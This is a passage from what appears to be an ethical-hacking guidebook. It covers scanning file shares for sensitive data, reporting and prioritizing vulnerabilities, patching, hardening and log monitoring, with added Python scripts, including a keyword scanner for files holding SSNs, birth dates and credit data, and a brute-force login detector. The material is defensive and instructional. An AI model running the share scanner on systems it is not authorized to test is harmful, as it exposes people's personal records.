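TARGET_EXTENSIONS = {".txt", ".doc", ".docx", ".rtf", ".xls", ".xlsx", ".pdf"}

# Keyword strings the chapter recommends, compiled as case-insensitive
# whole-word patterns so "credit" does not fire inside "accredited".
KEYWORDS = ("DOB", "SSN", "License", "Credit", "CCV")
KEYWORD_PATTERNS = {
    k: re.compile(r"\b%s\b" % re.escape(k), re.IGNORECASE) for k in KEYWORDS
}

ZIP_FORMATS = {".docx", ".xlsx"}   # Office Open XML: zip archives of XML parts
TAG_RE = re.compile(r"<[^>]+>")


def extract_text(path):
    """Return the searchable text of one file.

    .docx/.xlsx are unzipped and their XML parts tag-stripped. Every other
    target type is decoded as UTF-8 with undecodable bytes dropped, which
    catches strings stored in the clear in .pdf/.doc/.xls but misses
    compressed PDF streams (the chapter's tools handle those properly).
    """
    ext = os.path.splitext(path)[1].lower()
    if ext in ZIP_FORMATS:
        parts = []
        with zipfile.ZipFile(path) as zf:
            for name in zf.namelist():
                if name.endswith(".xml"):
                    xml = zf.read(name).decode("utf-8", errors="ignore")
                    parts.append(TAG_RE.sub(" ", xml))
        return " ".join(parts)
    with open(path, "rb") as fh:
        return fh.read().decode("utf-8", errors="ignore")


def search_text(text, path, context=25):
    """Return one hit per keyword match: file path, keyword, short snippet."""
    hits = []
    for keyword, pattern in KEYWORD_PATTERNS.items():
        for m in pattern.finditer(text):
            lo, hi = max(0, m.start() - context), min(len(text), m.end() + context)
            snippet = " ".join(text[lo:hi].split())  # collapse newlines and runs of spaces
            hits.append({"path": path, "keyword": keyword, "snippet": snippet})
    return hits


def scan_tree(root):
    """Walk root and collect hits from files of the target types.

    Run this as a regular user, as the chapter advises: the files the walk
    can open are exactly the files that user can read.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in TARGET_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            try:
                text = extract_text(path)
            except (OSError, zipfile.BadZipFile):
                continue  # unreadable or corrupt: skip rather than abort the sweep
            findings.extend(search_text(text, path))
    return sorted(findings, key=lambda h: (h["path"], h["keyword"]))


def build_sample_share(root):
    """Constructed sample data standing in for an open share (not real records)."""
    hr_dir = os.path.join(root, "HR")
    os.makedirs(hr_dir)
    with open(os.path.join(hr_dir, "new_hires.txt"), "w", encoding="utf-8") as fh:
        fh.write("Name: J. Doe\nDOB: 01/02/1980\nSSN: 000-00-0000\n")
    # A minimal .docx: one XML part inside a zip container
    with zipfile.ZipFile(os.path.join(root, "orders.docx"), "w") as zf:
        zf.writestr("word/document.xml",
                    "<w:p><w:t>Customer credit card kept on file</w:t></w:p>")
    with open(os.path.join(root, "server.log"), "w", encoding="utf-8") as fh:
        fh.write("SSN lookup failed\n")          # .log is not a target type: skipped
    with open(os.path.join(root, "notes.txt"), "w", encoding="utf-8") as fh:
        fh.write("Accredited licensees meet on Monday\n")  # no whole-word hits


def run_demo():
    """Scan the constructed share and return (relative path, keyword) pairs."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_share(root)
        return [(os.path.relpath(h["path"], root).replace(os.sep, "/"), h["keyword"])
                for h in scan_tree(root)]


if __name__ == "__main__":
    for rel_path, keyword in run_demo():
        print("%-20s %s" % (rel_path, keyword))
```

Point scan_tree at a real mount point to use it on a share; hits carry the snippet so a reviewer can tell a true positive from a form template before escalating.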

An example of a basic text search using FileLocator Pro is shown in Figure 16-4. Note the files found in different locations on the server.

Figure 16-4: Using FileLocator Pro to search for sensitive text on unprotected shares.

FileLocator Pro also has the ability to search for content inside PDF files to uncover sensitive data.

To speed the process, you can use Sensitive Data Manager, a really neat tool designed for the very purpose of scanning storage devices for sensitive, personally identifiable information. It can also search inside binary files such as PDFs.

For a second round of testing, you could perform your searches logged in as an administrator. You're likely to find a lot of sensitive information scattered about. It might seem worthless at first; however, this can highlight sensitive information stored in places it shouldn't be or that network administrators shouldn't have access to.

Testing is highly dependent on timing, searching for the right keywords, and looking at the right systems on the network. You likely won't root out every single bit of sensitive information, but this effort will show you where certain problems are, which will help you to justify the need for stronger access controls and better IT and security management processes.

Following Best Practices for Minimizing Storage Security Risks

Like database security, storage security is not brain surgery. Keeping your storage systems secure is also simple if you do the following:

Check the underlying operating systems for security vulnerabilities. I cover operating system exploits for Windows and Linux in Chapters 12 and 13.

Ensure that your network storage (SAN and NAS systems) falls within the scope of patching and system hardening.

Require strong passwords on every storage management interface.

Use appropriate file and share permissions to keep prying eyes away.

Educate your users on where to store sensitive information and the risks of mishandling it.

De-identify any sensitive production data before it's used in development or QA. There are tools made for this specific purpose.

Use a network firewall, such as those available from Fortinet (www.fortinet.com) or WatchGuard Technologies (www.watchguard.com), to ensure only the people and systems that need to access your storage environment can do so and nothing more.

Part VI

Security Testing Aftermath

Five Pieces of Information Every Security Report Must Have

Date(s) the testing was performed

Tests that were performed

Summary of the vulnerabilities discovered

Prioritized list of vulnerabilities that need to be addressed

Recommendations and specific steps on how to plug the security holes found

Learn how to keep up your security testing momentum at www.dummies.com/extras/hacking.

In this part…

Now that the hard—or at least technical—stuff is over with, it's time to pull everything together, fix what's broken, and establish good information security practices to help you move forward.

First, this part covers reporting the security vulnerabilities you discover to help get management buy-in and hopefully more money in your budget to make things right. This part then covers good practices for plugging the security holes within your systems. Finally, this part covers what it takes to manage change within your information systems for long-term success, including outsourcing ethical hacking to help ease the burden of your massive to-do list! That's what working in information security is all about anyway, right?

Chapter 17

Reporting Your Results

In This Chapter

Bringing your test data together

Categorizing vulnerabilities you discover

Documenting and presenting the results

If you're wishing for a break after testing, now isn't the time to rest on your laurels. The reporting phase of your security assessment is one of the most critical pieces. The last thing you want to do is to run your tests, find security problems, and leave it at that. Put your time and effort to good use by thoroughly analyzing and documenting what you find to ensure that security vulnerabilities are eliminated and your information is more secure as a result. Reporting is an essential element of the ongoing vigilance that information security and risk management requires.

Reporting includes sifting through all your findings to determine which vulnerabilities need to be addressed and which ones don't really matter. Reporting also includes briefing management or your client on the various security issues you find, as well as giving specific recommendations for making improvements. You share the information you've gathered and give the other parties guidance on where to go from there. Reporting also shows that the time, effort, and money invested in the security tests were put to good use.

Pulling the Results Together

When you have gobs of test data—from screenshots and manual observations you documented to detailed reports generated by the various vulnerability scanners you used—what do you do with it all? You need to go through your documentation with a fine-toothed comb and highlight all the areas that stand out. Base your decisions on the following:

Vulnerability rankings from your assessment tools

Your knowledge as an IT/security professional

The context of the vulnerability and how it actually impacts the business

So that you can find out more information about the vulnerability, many feature-rich security tools assign each vulnerability a ranking (based on overall risk), explain the vulnerability, give possible solutions, and include relevant links to the following: vendor sites, the Common Vulnerabilities and Exposures website at http://cve.mitre.org, and the National Vulnerability Database at https://nvd.nist.gov. For further research, you might also need to reference your vendor's site, other support sites, and online forums to see whether the vulnerability affects your particular system and situation. Overall business risk is your main focus.

In your final report document, you might want to organize the vulnerabilities as shown in the following list:

Nontechnical findings

    Social engineering vulnerabilities

    Physical security vulnerabilities

    IT and security operations vulnerabilities

Technical findings

    Network infrastructure

    Operating systems

    Firewall rulebases

    Databases

    Web applications

    Mobile apps

    Mobile devices

For further clarity, you can create separate sections in your report for internal and external security vulnerabilities as well as high and moderate priority. One final note: it's generally a good idea to vet your findings with system owners first to ensure that they're actually valid.

Prioritizing Vulnerabilities

Prioritizing the security vulnerabilities you find is critical because many issues might not be fixable, and others might not be worth fixing. You might not be able to eliminate some vulnerabilities because of various technical reasons, and you might not be able to afford to eliminate others. Or, simply enough, your business may have a certain level of risk tolerance. Every situation is different. You need to factor whether the benefit is worth the effort and cost. On the other hand, spending a few weeks' worth of development time to fix cross-site scripting and SQL injection vulnerabilities could be worth a lot of money, especially if you end up getting dinged by third parties or lose potential customers. The same goes for mobile devices that everyone swears contain no sensitive information. You need to study each vulnerability carefully, determine the business risk, and weigh whether the issue is worth fixing.

It's impossible—or at least not worth trying—to fix every vulnerability that you find. Analyze each vulnerability carefully and determine your worst-case scenarios. So you have cross-site request forgery (CSRF) on your printer's web interface? What's the business risk? Perhaps FTP is running on numerous internal servers. What's the business risk? For many security flaws, you'll likely find the risk is just not there.

I've found that with security—like most areas of life—you have to focus on your highest payoff tasks. Otherwise, you'll drive yourself nuts and probably won't get very far in meeting your own goals. Here's a quick method to use when prioritizing your vulnerabilities. You can tweak this method to accommodate your needs. You need to consider two major factors for each of the vulnerabilities you discover:

Likelihood of exploitation: How likely is it that the specific vulnerability you're analyzing will be taken advantage of by a hacker, a malicious user, malware, or some other threat?

Impact if exploited: How detrimental would it be if the vulnerability you're analyzing were exploited?

Many people often skip these considerations and assume that every vulnerability discovered has to be resolved. Big mistake. Just because a vulnerability is discovered doesn't mean it applies to your particular situation and environment. If you go in with the mindset that every vulnerability will be addressed regardless of circumstances, you'll waste a lot of unnecessary time, effort, and money, and you can set up your security assessment program for failure in the long term. However, be careful not to swing too far in the other direction! Many vulnerabilities don't appear too serious on the surface but could very well get your organization into hot water if they're exploited. Dig in deep and use some common sense.

Rank each vulnerability, using criteria such as High, Medium, and Low or a 1-through-5 rating (where 1 is the lowest priority and 5 is the highest) for each of the two considerations. Table 17-1 shows a sample table and a representative vulnerability for each category.

Table 17-1 Prioritizing Vulnerabilities

High Impact, High Likelihood: Sensitive information stored on an unencrypted laptop

High Impact, Medium Likelihood: Tape backups taken offsite that are not encrypted and/or password protected

High Impact, Low Likelihood: No administrator password on an internal SQL Server system

Medium Impact, High Likelihood: Unencrypted e-mails containing sensitive information being sent

Medium Impact, Medium Likelihood: Missing Windows patch on an internal server that can be exploited using Metasploit

Medium Impact, Low Likelihood: No passwords required on several Windows administrator accounts

Low Impact, High Likelihood: Outdated virus signatures on a standalone PC dedicated to Internet browsing

Low Impact, Medium Likelihood: Employees or visitors gaining unauthorized network access

Low Impact, Low Likelihood: Weak encryption ciphers being used on a marketing website

The vulnerability prioritization shown in Table 17-1 is based on the qualitative method of assessing security risks. In other words, it's subjective, based on your knowledge of the systems and vulnerabilities. You can also consider any risk ratings you get from your security tools—just don't rely solely on them, because a vendor can't provide ultimate rankings of vulnerabilities.

Creating Reports

You may need to organize your vulnerability information into a formal document for management or for your client. This is not always the case, but it's often the professional thing to do and shows that you take your work seriously. Ferret out the critical findings and document them so that other parties can understand them.

Graphs and charts are a plus. Screen captures of your findings—especially when it's difficult to save the data to a file—add a nice touch to your reports and show tangible evidence that the problem exists.

Document the vulnerabilities in a concise, nontechnical manner. Every report should contain the following information:

Date(s) the testing was performed

Tests that were performed

Summary of the vulnerabilities discovered

Prioritized list of vulnerabilities that need to be addressed

Recommendations and specific steps on how to plug the security holes found

It always adds value if you can perform an operational assessment of IT/security processes. I recommend adding a list of general observations around weak business processes, management's support of IT and security, and so on, along with recommendations for addressing each issue. You can look at this as sort of a root cause analysis.

Most people want the final report to include a summary of the findings—not everything. The last thing most people want to do is sift through a 600-page PDF file containing technical jargon that means very little to them. Many consulting firms have been known to charge megabucks for this very type of report. And they get away with it. But that doesn't make it right.

Administrators and developers need the raw data reports from the security tools. That way, they can reference the data later when they need to see specific HTTP requests/responses, details on missing patches, and so on.

As part of the final report, you might want to document behaviors you observe when carrying out your security tests. For example, are employees completely oblivious or even belligerent when you carry out an obvious social engineering attack? Does the IT or security staff completely miss technical tip-offs, such as the performance of the network degrading during testing or various attacks appearing in system log files? You can also document other security issues you observe, such as how quickly IT staff or managed service providers respond to your tests or whether they respond at all. Following the root cause analysis approach, any missing, incomplete, or not followed procedures need to be documented.

Guard the final report to keep it secure from people who are not authorized to see it. A security assessment report and the associated data and supporting files in the hands of a competitor, hacker, or malicious insider could spell trouble for the organization. Here are some ways to prevent this from happening:

Deliver the report and associated documentation and files only to those who have a business need to know.

If sending the final report electronically, encrypt all attachments, such as documentation and test results, using an encrypted ZIP format or a secure cloud file-sharing service.

Chapter 18

Plugging Security Holes

In This Chapter

Determining which vulnerabilities to address first

Patching your systems

Looking at security in a new light

After you complete your tests, you want to head down the road to greater security. However, you found some security vulnerabilities—things that need to be addressed. (I hope not too many serious ones, though!) Plugging these security holes before someone exploits them is going to require a little elbow grease. You need to come up with your game plan and decide which security vulnerabilities to address first. A few patches might be in order and possibly even some system hardening. You may need to purchase some new security technologies and might want to reevaluate your network design and security infrastructure as well. I touch on some of the critical areas in this chapter.

Turning Your Reports into Action

It might seem that the security vulnerability to address first would be obvious, but it's often not very clear. When reviewing the vulnerabilities that you find, consider the following variables:

How critical the vulnerable system is

What sensitive information or business processes are at stake

Whether the vulnerability can be fixed

How easy the vulnerability is to fix

Whether you can take the system offline to fix the problem

What time, money, and effort is involved in purchasing new hardware or software or retooling business processes to plug the holes

In Chapter 17, I cover the basic issues of determining how important and how urgent the security problem is. In fact, I provide real-world examples in Table 17-1. You should also look at security from a time management perspective and address the issues that are both important (high impact) and urgent (high likelihood). You probably don't want to try to fix the vulnerabilities that are just high impact or just high likelihood. You might have some high impact vulnerabilities that, likely, will never be exploited. Likewise, you probably have some vulnerabilities with a high likelihood of being exploited that, if they are exploited, won't really make a big difference in your business or your job. This type of human analysis and perspective will help you stand out from the scan-and-run type assessments that many people perform (often in the name of some compliance regulation) and keep you employed for some time to come!

Focus on tasks with the highest payoff first—those that are both high impact and high likelihood. This will likely be the minority of your vulnerabilities. After you plug the most critical security holes, you can go after the less important and less urgent tasks when time and money permit. For example, after you plug such critical holes as SQL injection in web applications and missing patches on important servers, you might want to reconfigure your backups with passwords, if not strong encryption, to keep prying eyes away in case your backups fall into the wrong hands.
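The likelihood-and-impact method of Table 17-1 in Chapter 17, together with the "both high impact and high likelihood first" rule above, as an added Python example that is not from the book: it rates each finding on the 1-through-5 scale, sorts the findings into the table's 3x3 grid, assigns each one a work queue, and produces the prioritized list a report needs. The nine sample findings and their cells come from Table 17-1; the queue names and the product score used for ordering are assumptions of this example.

```python
from dataclasses import dataclass

# 1-5 scale from the chapter: 1 is the lowest rating, 5 the highest.
LEVEL_SCORE = {"High": 5, "Medium": 3, "Low": 1}


@dataclass(frozen=True)
class Finding:
    title: str
    likelihood: int  # 1 (rarely, if ever, exploited) .. 5 (almost certain)
    impact: int      # 1 (nuisance) .. 5 (severe business harm)


def level(score):
    """Collapse a 1-5 rating back to the High/Medium/Low label of Table 17-1."""
    if score >= 4:
        return "High"
    if score >= 2:
        return "Medium"
    return "Low"


def tier(finding):
    """Work queue for a finding, following the important-and-urgent rule."""
    high_l, high_i = finding.likelihood >= 4, finding.impact >= 4
    if high_l and high_i:
        return "fix first"          # both high: the minority to tackle now
    if high_l or high_i:
        return "schedule"           # one factor high: plan it, don't drop it
    return "accept or monitor"      # neither high: record the decision


def risk_score(finding):
    """Combined score (likelihood x impact, 1..25); an assumption of this example."""
    return finding.likelihood * finding.impact


def prioritize(findings):
    """Prioritized list for the report: highest combined risk first, impact breaks ties."""
    return sorted(findings, key=lambda f: (-risk_score(f), -f.impact, f.title))


def risk_matrix(findings):
    """Group titles into the 3x3 grid of Table 17-1, keyed (impact, likelihood)."""
    grid = {(i, l): [] for i in LEVEL_SCORE for l in LEVEL_SCORE}
    for f in findings:
        grid[(level(f.impact), level(f.likelihood))].append(f.title)
    return grid


# The nine representative vulnerabilities from Table 17-1, placed in the cells
# the table gives them (labels converted with LEVEL_SCORE).
SAMPLE_FINDINGS = [
    Finding("Sensitive information stored on an unencrypted laptop", 5, 5),
    Finding("Tape backups taken offsite that are not encrypted and/or password protected", 3, 5),
    Finding("No administrator password on an internal SQL Server system", 1, 5),
    Finding("Unencrypted e-mails containing sensitive information being sent", 5, 3),
    Finding("Missing Windows patch on an internal server that can be exploited using Metasploit", 3, 3),
    Finding("No passwords required on several Windows administrator accounts", 1, 3),
    Finding("Outdated virus signatures on a standalone PC dedicated to Internet browsing", 5, 1),
    Finding("Employees or visitors gaining unauthorized network access", 3, 1),
    Finding("Weak encryption ciphers being used on a marketing website", 1, 1),
]


def report_lines(findings):
    """Plain-text prioritized list ready to paste into the report."""
    return ["%2d  %-18s %s" % (risk_score(f), tier(f), f.title)
            for f in prioritize(findings)]


if __name__ == "__main__":
    print("\n".join(report_lines(SAMPLE_FINDINGS)))
```

Replace SAMPLE_FINDINGS with your own ratings; the ordering is only as good as the judgment behind the two numbers, which is the chapter's point about not relying on vendor rankings alone.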

Patching for Perfection

Do you ever feel like all you do is patch your systems to fix security vulnerabilities? If your answer is yes to this question, good for you—at least you're doing it! If you constantly feel pressure to patch your systems the right way but can't seem to find time—at least it's on your radar. Many IT professionals and their managers don't even think about proactively patching their systems until after a breach occurs. Just look at the research in the Verizon Data Breach Investigations Report (among others). Patch management is a huge security failure across organizations in all industries. If you're reading this book, you're obviously concerned about security and are hopefully way past that.

Whatever you do, whatever tool you choose, and whatever procedures work best in your environment, keep your systems patched! This goes for operating systems, web servers, databases, mobile apps, and even firmware on your network firewalls, routers, and switches.

Patching is avoidable but inevitable. The only real solution to eliminating the need for patches is developing secure software in the first place, but that's not going to happen anytime soon, if ever. Software is just too complex for it to be perfect. A large portion of security incidents can be prevented with some good patching practices, so there's simply no reason not to have a solid patch management process in place.

Patch management

If you can't keep up with the deluge of security patches for all your systems, don't despair; you can still get a handle on the problem. Here are my basic tenets for applying patches to keep your systems secure:

Make sure all the people and departments that are involved in applying patches on your organization's systems are on the same page and follow the same procedures.

Have formal and documented procedures in place for these critical processes:

    Obtaining patch alerts from your vendors, including third-party patches for Adobe, Java, and so on, which are often overlooked (and often the most critical)

    Assessing which patches affect your systems

    Determining when to apply patches

Make it policy and have procedures in place for testing patches before you apply them to your production servers. Testing patches after you apply them isn't as big of a deal on workstations, but servers are a different story. Many patches have "undocumented features" and subsequent unintended side effects—believe me, I've experienced this before. An untested patch is an invitation for system termination!

Patch automation

The following sections describe the various patch deployment tools you can use to lower the burden of constantly having to keep up with patches.

Commercial tools

I recommend a robust patch-automation application, especially if these factors are involved:

A large network

A network with a multitude of operating systems (Windows, Linux, Mac OS X, and so on)

A lot of third-party software applications, such as Adobe and Java

More than a few dozen computers

Be sure to check out these patch-automation solutions:

Ecora Patch Manager (www.ecora.com/ecora/products/patchmanager.asp)

GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)

IBM BigFix (www-03.ibm.com/security/bigfix)

Shavlik Patch (www.shavlik.com/products/patch)

Free tools

Use one of these free tools to help with automated patching:

Windows Server Update Services (WSUS) (http://technet.microsoft.com/en-us/windowsserver/bb332157.aspx)

Windows Update, which is built into Microsoft Windows operating systems

Microsoft Baseline Security Analyzer (MBSA) (www.microsoft.com/technet/security/tools/mbsahome.mspx)

The built-in patching tools for Linux-based systems (such as Yellowdog Updater, Modified [yum] and YaST Online Update)

Hardening Your Systems

In addition to patching your systems, you have to make sure your systems are hardened (locked down) from the security vulnerabilities that patches can't fix. I've found that many people stop with patching, thinking their systems are secure, but that's just not the case. Throughout the years, I've seen network administrators ignore recommended hardening practices from such organizations as the National Institute of Standards and Technology (NIST) (http://csrc.nist.gov/publications/PubsSPs.html) and the Center for Internet Security (www.cisecurity.org), leaving many security holes wide open. However, I'm a true believer that hardening systems from malicious attack is not foolproof, either. Because every system and every organization's needs are different, there is no one-size-fits-all solution, so you have to strike a balance and not rely on any single option too much.

It's a good idea to rescan your systems for vulnerabilities once your patches are applied.

Paying the piper

I was once involved in an incident response project that involved over 10,000 Windows servers and workstations being infected with targeted malware. Advanced malware had taken a foothold. The business found the infection early on and thought the IT team had cleaned it up. Time passed, and they realized a year or so later they had not cleaned up the entire mess. The malware had come back with a vengeance to the point where their entire network was essentially under surveillance by foreign, state-sponsored, criminal hackers.

After dozens of people spent many hours getting to the root of the problem, it was determined that the IT department had not done what it should've been doing in terms of patching and hardening its systems from the get-go. On top of that, there was a serious communication breakdown between IT and other departments, including security, the help desk, and business operations. It was a case of too little too late that ended up getting a very large business into a very large bind. The lesson here is that improperly secured systems can create a tremendous burden on your business.

This book presents hardening countermeasures that you can implement for your network, computers, and even physical systems and people. I find these countermeasures work the best for the respective systems.

Implementing at least the basic security practices is critical. Whether installing a firewall on the network or requiring users to have strong passwords via a Windows domain GPO—you must address the basics if you want any modicum of security. Beyond patching, if you follow the countermeasures I document, add the other well-known security practices for network systems (routers, servers, workstations, and so on) that are freely available on the Internet, and perform ongoing security tests, you can rest assured that you're doing your best to keep your organization's information secure.

Assessing Your Security Infrastructure

A review of your overall security infrastructure can add oomph to your systems:

Look at how your overall network is designed. Consider organizational issues, such as whether policies are in place, maintained, or even taken seriously. Physical issues count as well. Do members of management have buy-in on information security and compliance, or do they simply shrug the measure off as an unnecessary expense or barrier to conducting business?

Map your network by using the information you gather from the security tests in this book. Updating existing documentation is a major necessity. Outline IP addresses, running services, and whatever else you discover. Draw your network diagram—network design and overall security issues are a whole lot easier to assess when you can work with them visually. Although I prefer to use a technical drawing program, such as Visio or Cheops-ng (http://cheops-ng.sourceforge.net), to create network diagrams, such a tool isn't necessary. You can draw out your map on a whiteboard like many people do, and that's just fine.

Be sure to update your diagrams when your network changes or at least once every year or so.

Think about your approach to correcting vulnerabilities and increasing your organization's overall security. Are you focusing all your efforts on the perimeter and not on a layered security approach? Think about how most convenience stores and banks are protected. Security cameras focus on the cash registers, teller computers, and surrounding areas—not just on the parking lot or entrances. Look at security from a defense-in-depth perspective. Make sure that several layers of security are in place in case one measure fails, so the attacker must go through other barriers to carry out a successful attack.

Think about security policies and procedures at an organizational level. Document what security policies and procedures are in place and whether they're effective. No organization is immune to gaps in this area.

Look at the overall security culture within your organization and see what it looks like from an outsider's perspective. What would customers or business partners think about how your organization treats their sensitive information?

Looking at your security from a high-level and nontechnical perspective gives you a new outlook on security holes. It takes some time and effort at first, but after you establish a baseline of security, it's much easier to manage new threats and vulnerabilities.

Chapter 19

Managing Security Processes

In This Chapter

Automating tasks

Watching for misbehavior

Outsourcing your security testing

Keeping security on everyone’s mind

Information security is an ongoing process that you must manage effectively to be successful. This management goes beyond periodically applying patches and hardening systems. Performing your security tests repeatedly is critical; information security vulnerabilities emerge constantly. To put it another way, security tests are just a snapshot of your overall information security, so you have to perform your tests continually to keep up with the latest issues. Ongoing vigilance is required not only for compliance with various laws and regulations but also for minimizing business risks related to your information systems.

Automating the Ethical Hacking Process

You can run a large portion of the following ethical hacking tests in this book automatically:

Ping sweeps and port scans to show what systems are available and what’s running

Password cracking tests to attempt access to external web applications, remote access servers, and so on

Vulnerability scans to check for missing patches, misconfigurations, and exploitable holes

Exploitation of vulnerabilities (to an extent, at least)

You must have the right tools to automate these tests, for example:

Some commercial tools can set up periodic assessments and create nice reports for you without any hands-on intervention—just a little setup and scheduling time up front. This is why I like many of the commercial—and mostly automated—security testing tools, such as Nexpose and AppSpider. The automation you get from these tools often helps justify the price, especially because you don’t have to be up at 2:00 a.m. or on call 24 hours a day to monitor the testing.

Standalone security tools, such as Nmap, John the Ripper, and Aircrack-ng, are great but they aren’t enough. You can use the Windows Task Scheduler and AT commands on Windows systems and cron jobs on Linux-based systems, but manual steps and human intellect are still required.

Links to these tools and many others are located in the Appendix.

Certain tests and phases, such as enumeration of new systems, various web application tests, social engineering, and physical security walkthroughs, simply cannot be set on autopilot. You have to be involved.

Even the smartest computer “expert system” can’t accomplish security tests. Good security requires technical expertise, experience, and good old-fashioned common sense.

Monitoring Malicious Use

Monitoring security-related events is essential for ongoing security efforts. This can be as basic and mundane as monitoring log files on routers, firewalls, and critical servers every day. Advanced monitoring might include implementing a security incident and event management (SIEM) system to monitor every little thing that’s happening in your environment. A common method is to deploy an intrusion prevention system (IPS) or data loss prevention (DLP) system and monitor for malicious behavior.

The problem with monitoring security-related events is that humans find it very boring and very difficult to do effectively. Each day, you could dedicate a time—such as first thing in the morning—to checking your critical log files from the previous night or weekend to ferret out intrusions and other computer and network security problems. However, do you really want to subject yourself or someone else to that kind of torture?

However, manually sifting through log files probably isn’t the best way to monitor the system. Consider the following drawbacks:

Finding critical security events in system log files is difficult, if not impossible. It’s just too tedious a task for the average human to accomplish effectively.

Depending on the type of logging and security equipment you use, you might not even detect some security events, such as IPS evasion techniques and exploits carried out over allowed ports on the network.

Instead of panning through all your log files for hard-to-find intrusions, here’s what I recommend:

Enable system logging where it’s reasonable and possible. You don’t necessarily need to capture all computer and network events, but you should definitely look for certain obvious ones, such as login failures, policy changes, and unauthorized file access.

Log security events using syslog, a write once read many (WORM) device, or another central server on your network. Do not keep logs on the local host, if possible, to help prevent the bad guys from tampering with log files to cover their tracks.
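The recommendation above names login failures and policy changes as the obvious events to look for and says to ship logs to a central server. As an added example (this is not code from the book), here is a small Python script that does the kind of first-pass triage a central syslog server could run on a schedule instead of a person reading logs each morning. The sample log, host name, addresses, user names, failure threshold and the list of account-management commands are all constructed for illustration. It counts failed logins per source address, flags a successful login from a source that had already crossed the failure threshold (the pattern that matters most), and picks out sudo invocations of account-management commands as policy changes.

```python
"""Triage syslog-style auth lines for login failures and policy changes.

Added example: the log text below is constructed, not captured from a real
system, and the thresholds/command list are assumptions for illustration.
"""
import re
from collections import Counter

# Constructed sample input in the usual syslog "MMM DD HH:MM:SS host prog: msg" layout.
SAMPLE_LOG = """\
Mar 10 02:13:01 fileserver sshd[2011]: Failed password for invalid user admin from 203.0.113.45 port 51022 ssh2
Mar 10 02:13:04 fileserver sshd[2011]: Failed password for invalid user admin from 203.0.113.45 port 51023 ssh2
Mar 10 02:13:07 fileserver sshd[2011]: Failed password for root from 203.0.113.45 port 51024 ssh2
Mar 10 02:13:09 fileserver sshd[2011]: Failed password for root from 203.0.113.45 port 51025 ssh2
Mar 10 02:13:12 fileserver sshd[2011]: Failed password for root from 203.0.113.45 port 51026 ssh2
Mar 10 02:13:15 fileserver sshd[2011]: Accepted password for root from 203.0.113.45 port 51027 ssh2
Mar 10 08:02:44 fileserver sshd[3100]: Failed password for jsmith from 192.0.2.17 port 40011 ssh2
Mar 10 08:02:50 fileserver sshd[3100]: Accepted publickey for jsmith from 192.0.2.17 port 40012 ssh2
Mar 10 09:15:00 fileserver sudo: jsmith : TTY=pts/0 ; PWD=/home/jsmith ; USER=root ; COMMAND=/usr/sbin/usermod -aG sudo tempuser
"""

FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED_RE = re.compile(r"Accepted (\S+) for (\S+) from (\S+) port \d+")
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*?COMMAND=(.+)$")

# Commands whose execution via sudo we treat as an account/policy change (assumption).
POLICY_COMMANDS = ("usermod", "useradd", "userdel", "groupadd", "passwd", "visudo")


def parse_events(text):
    """Turn raw syslog lines into (kind, user, source, detail) tuples; skip the rest."""
    events = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            events.append(("failed_login", m.group(1), m.group(2), ""))
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            # detail records the auth method (password, publickey, ...)
            events.append(("login", m.group(2), m.group(3), m.group(1)))
            continue
        m = SUDO_RE.search(line)
        if m:
            events.append(("sudo", m.group(1), "local", m.group(2).strip()))
    return events


def summarize(events, threshold=3):
    """Reduce the event stream to the three findings a reviewer should see first."""
    failures = Counter()     # failed logins per source address
    flagged_logins = []      # successes from a source already at/over threshold
    policy_changes = []      # sudo runs of account-management commands
    for kind, user, src, detail in events:
        if kind == "failed_login":
            failures[src] += 1
        elif kind == "login":
            # A success right after a burst of failures is the classic
            # "guessed it" signature; a lone earlier failure is just a typo.
            if failures[src] >= threshold:
                flagged_logins.append((src, user))
        elif kind == "sudo":
            command = detail.split()[0].rsplit("/", 1)[-1]
            if command in POLICY_COMMANDS:
                policy_changes.append((user, detail))
    noisy_sources = sorted(
        ((src, n) for src, n in failures.items() if n >= threshold),
        key=lambda item: -item[1],
    )
    return {
        "brute_force_sources": noisy_sources,
        "success_after_failures": flagged_logins,
        "policy_changes": policy_changes,
    }


if __name__ == "__main__":
    report = summarize(parse_events(SAMPLE_LOG))
    for heading, rows in report.items():
        print(heading)
        for row in rows:
            print("  ", row)
```

Run against the constructed sample, the script reports 203.0.113.45 as a noisy source (five failures), flags the later successful root login from that same address, and lists the usermod call as a policy change; the single mistyped password from 192.0.2.17 followed by a key-based login is correctly ignored.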

The following are a couple of good solutions to the security-monitoring dilemma:

Purchase an event-logging system. A few low-priced yet effective solutions are available, such as GFI EventsManager (www.gfi.com/products-and-solutions/network-security-solutions/gfi-eventsmanager). Typically, lower-priced event-logging systems support only one OS platform—Microsoft Windows is the most common. Higher-end solutions, such as HP ArcSight Logger (www8.hp.com/us/en/software-solutions/arcsight-logger-log-management), offer both log management across various platforms and event correlation to help track down the source of security problems and the various systems affected during an incident.

Outsource security monitoring to a third-party managed security services provider (MSSP) in the cloud. Dozens of MSSPs were around during the Internet boom, but only a few big ones remain, such as Dell SecureWorks (www.secureworks.com) and Alert Logic (www.alertlogic.com). These companies are now considered cloud service providers, and the value in outsourcing security monitoring is that they often have facilities and tools that you would likely not be able to afford and maintain. They also have analysts working around the clock and have the security experience and knowledge they gain from other customers to share with you.

When these cloud service providers discover a security vulnerability or intrusion, they can usually address the issue immediately, often without your involvement. I recommend at least checking whether third-party firms and their services can free some of your time and resources so that you can focus on other things. Just don’t depend solely on their monitoring efforts; a cloud service provider may have trouble catching insider abuse, social engineering attacks, and web application exploits that are carried out over secured sessions (i.e., HTTPS). You still need to be involved.

Outsourcing Security Assessments

Outsourcing your security assessments is very popular and a great way for organizations to get an unbiased third-party perspective of their information security. Outsourcing allows you to have a checks-and-balances system that clients, business partners, auditors, and regulators like to see.

Outsourcing ethical hacking can be expensive. Many organizations spend tens of thousands of dollars—often more—depending on the testing needed. However, doing all this yourself isn’t cheap—and quite possibly it isn’t as effective, either!

A lot of confidential information is at stake, so you must trust your outside consultants and vendors. Consider the following questions when looking for an independent expert or vendor to partner with:

